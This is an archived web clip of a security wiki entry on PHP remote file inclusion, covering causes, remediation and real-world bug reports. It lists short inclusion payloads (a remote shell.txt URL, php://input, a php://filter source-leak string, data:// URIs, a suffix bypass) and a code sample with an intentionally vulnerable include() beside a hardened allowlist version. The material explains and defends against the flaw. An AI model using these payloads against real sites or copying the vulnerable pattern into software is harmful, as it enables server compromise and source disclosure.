<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta name="exporter-version" content="Evernote Mac 6.8 (453748)"/><meta name="created" content="2016-10-19 12:48:56 +0000"/><meta name="source" content="web.clip"/><meta name="source-url" content="http://wiki.wooyun.org/web:rfi"/><meta name="updated" content="2016-10-19 12:48:56 +0000"/><title>web:rfi [WooYun WiKi]</title></head><body><div style="-evernote-webclip:true"><br/><div style="font-size: 16px"><div style="box-sizing:border-box;font-family:sans-serif;text-size-adjust:100%;font-size:10px;-webkit-tap-highlight-color:rgba(0, 0, 0, 0);"><div style="box-sizing:border-box;font-family:"Helvetica Neue", Helvetica, Arial, sans-serif;font-size:small;line-height:1.42857;color:rgb(51, 51, 51);background:rgb(253, 253, 253);"><div style="box-sizing:border-box;"><div style="box-sizing:border-box;"><span style="box-sizing:border-box;"><div style="box-sizing:border-box;"><div style="box-sizing:border-box;background-color:rgb(255, 255, 255);border-radius:4px;box-shadow:rgba(0, 0, 0, 0.0470588) 0px 1px 1px;"><div style="box-sizing:border-box;"><span style="display:table;"/>
<div style="box-sizing:border-box;position:fixed;float:right;z-index:1024;top:10px;right:10px;">
<div style="float:right;box-sizing:border-box;background-color:rgb(255, 255, 255);border-radius:4px;box-shadow:rgba(0, 0, 0, 0.0470588) 0px 1px 1px;border-color:rgb(221, 221, 221);border:1px solid transparent;margin:0px 0px 1.4em 1.4em;width:auto;color:inherit;font-size:0.95em;margin-left:20px;">
<h3 style="border-bottom:1px solid transparent;box-sizing:border-box;border-top-left-radius:3px;font-weight:bold;color:rgb(51, 51, 51);border-color:rgb(221, 221, 221);background-color:rgb(245, 245, 245);font-family:inherit;line-height:1.1;border-top-right-radius:3px;padding:5px;font-size:0.95em;margin:0px;cursor:pointer;"><i style="box-sizing:border-box;position:relative;top:1px;display:inline-block;font-family:"Glyphicons Halflings";font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;padding-right:5px;"><span style="font-family:"Glyphicons Halflings";font-style:normal;font-weight:400;line-height:1;"></span></i> <strong style="line-height:1;font-weight:400;top:1px;display:inline-block;font-family:"Glyphicons Halflings";font-style:normal;position:relative;-webkit-font-smoothing:antialiased;box-sizing:border-box;float:right;margin:0px 0.2em;padding-right:5px;"><span style="font-weight:400;font-family:"Glyphicons Halflings";font-style:normal;line-height:1;"></span></strong></h3>
</div>
</div>
<h1 style="box-sizing:border-box;font-size:36px;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin:40px 0px 20px;padding-bottom:9px;border-bottom:1px solid rgb(238, 238, 238);margin-top:10px;">Remote File Inclusion (Remote File Include)</h1>
<div style="box-sizing:border-box;"
/>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">1. Vulnerability Overview</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
If client-supplied user input is allowed to control which file the server dynamically includes, the result can be execution of malicious code and disclosure of sensitive information. The two main forms are <a href="https://web.archive.org/web/20160417161505/http://wiki.wooyun.org/web:lfi" title="web:lfi" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;">local file inclusion</a> and remote file inclusion.
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">2. Root Cause</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
A file inclusion vulnerability arises when a file is included using a supplied filename that has not been properly validated, or whose validation can be bypassed, so that a file other than the intended one is operated on; this can lead to unintended file disclosure or even malicious code injection. When the included file resides on a remote server, the result is a remote file inclusion vulnerability.
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">3. Detection and Exploitation</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
There is no universal detection method, but most scanners support detecting remote file inclusion vulnerabilities.
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
The following are the common ways a remote file gets included.
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
Common protocols:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">[http|https|ftp]://example.com/shell.txt</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
(requires allow_url_fopen=On and allow_url_include=On)
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
Using the PHP input stream:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">php://input</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
Requires allow_url_include=On; see <a href="https://web.archive.org/web/20160417161505/http://php.net/manual/zh/wrappers.php.php" title="http://php.net/manual/zh/wrappers.php.php" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">php:// — Accessing the various input/output streams (I/O streams)</a> and <a href="https://web.archive.org/web/20160417161505/http://www.nowamagic.net/academy/detail/12220520" title="http://www.nowamagic.net/academy/detail/12220520" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">An in-depth look at the PHP input stream php://input</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
Using the PHP filter stream:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">php://filter/convert.base64-encode/resource=index.php</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
Requires allow_url_include=On; see <a href="https://web.archive.org/web/20160417161505/http://php.net/manual/zh/wrappers.php.php" title="http://php.net/manual/zh/wrappers.php.php" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">php:// — Accessing the various input/output streams (I/O streams)</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
Using data URIs:
</p>
<pre style="line-height:1.42857;overflow:auto;font-size:13px;box-sizing:border-box;display:block;padding:9.5px;margin:0px 0px 10px;font-family:Menlo, Monaco, Consolas, "Courier New", monospace;color:rgb(51, 51, 51);word-break:break-all;word-wrap:break-word;background-color:rgb(245, 245, 245);border:1px solid rgb(204, 204, 204);border-radius:4px;">data://text/plain;base64,SSBsb3ZlIFBIUAo=</pre>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
(requires allow_url_include=On)
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
When the server automatically appends a suffix to the filename, adding '?' or '#' after the URL bypasses it.
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">4. Remediation</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
Filter the parameter that selects the included file, or restrict the domain from which files may be included, so that the server is forbidden from accessing files outside a trusted domain.
</p>
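<p style="box-sizing:border-box;margin:0px 0px 10px;">
As an added example (not code from the WooYun wiki page), the vulnerable pattern the sections above describe, a request parameter concatenated straight into include(), is shown beside a hardened version that only ever treats input as a key into a fixed allowlist and reports the php.ini setting the page names. The page directory /var/www/app/pages and the page names are assumptions.
</p>

```php
<?php
// Added example, not code from the WooYun wiki page. The directory
// /var/www/app/pages and the page names are assumed for illustration.

// Vulnerable pattern: the request parameter is concatenated into include(), so with
// allow_url_include=On a remote URL or a php://input, php://filter or data:// wrapper
// is loaded, and the forced ".php" suffix is defeated by a trailing "?" or "#".
function vulnerable_page(string $page): void
{
    include $page . '.php';
}

// Hardened pattern: user input is only a key into an allowlist; the real path is built
// from constants, so no wrapper, host or traversal sequence ever reaches include().
const PAGE_ALLOWLIST = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page, string $base = '/var/www/app/pages'): ?string
{
    if (!array_key_exists($page, PAGE_ALLOWLIST)) {
        return null;                       // unknown key: refuse rather than guess
    }
    $root = realpath($base);
    $path = realpath($base . '/' . PAGE_ALLOWLIST[$page]);
    // Defence in depth: even an allowlisted entry must resolve inside the page directory.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function hardened_page(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

// Deployment check for the setting the page names: with allow_url_include=Off,
// include() refuses URL wrappers regardless of what the application passes in.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}
```

The allowlist removes the need to filter the parameter at all; the realpath check and the ini check are the layers to keep when the allowlist is later edited by someone else.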
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">5. Real-World Cases</h3>
<div style="box-sizing:border-box;">
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://www.wooyun.org/bugs/wooyun-2010-059641" title="http://www.wooyun.org/bugs/wooyun-2010-059641" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">Remote file inclusion vulnerability on a Spring Airlines (春秋航空) sub-site</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://www.wooyun.org/bugs/wooyun-2010-0107969" title="http://www.wooyun.org/bugs/wooyun-2010-0107969" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">Remote file inclusion and blind MySQL injection on a 爱爱医 site</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://www.wooyun.org/bugs/wooyun-2010-012031" title="http://www.wooyun.org/bugs/wooyun-2010-012031" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">File inclusion vulnerability in a Huawei system</a>
</p>
</div>
<h3 style="box-sizing:border-box;font-family:inherit;font-weight:500;line-height:1.1;color:inherit;margin-top:20px;margin-bottom:10px;font-size:24px;">6. Related Resources</h3>
<div style="box-sizing:border-box;">
<hr style="border-left-style:initial;height:0px;margin-top:20px;margin-bottom:20px;border-width:1px 0px 0px;border-right-style:initial;border-bottom-style:initial;box-sizing:content-box;border-right-color:initial;border-bottom-color:initial;border-left-color:initial;border-image:initial;border-top-style:solid;border-top-color:rgb(238, 238, 238);"/>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://drops.wooyun.org/tips/3827" title="http://drops.wooyun.org/tips/3827" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">A summary of PHP file inclusion vulnerabilities</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://php.net/manual/zh/wrappers.php.php" title="http://php.net/manual/zh/wrappers.php.php" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">php:// — Accessing the various input/output streams (I/O streams)</a>
</p>
<p style="box-sizing:border-box;margin:0px 0px 10px;">
<a href="https://web.archive.org/web/20160417161505/http://www.nowamagic.net/academy/detail/12220520" title="http://www.nowamagic.net/academy/detail/12220520" rel="nofollow" style="box-sizing:border-box;background-color:transparent;color:rgb(51, 122, 183);text-decoration:none;background-repeat:no-repeat;background-position:0px center;padding:0px 0px 0px 18px;background-image:url(&quot;/web/20160409021439/http://wiki.wooyun.org/lib/images/external-link.png&quot;);">An in-depth look at the PHP input stream php://input</a>
</p>
</div>
<span style="display:table;clear:both;"/></div></div></div></span></div></div></div></div></div><br/></div></body></html>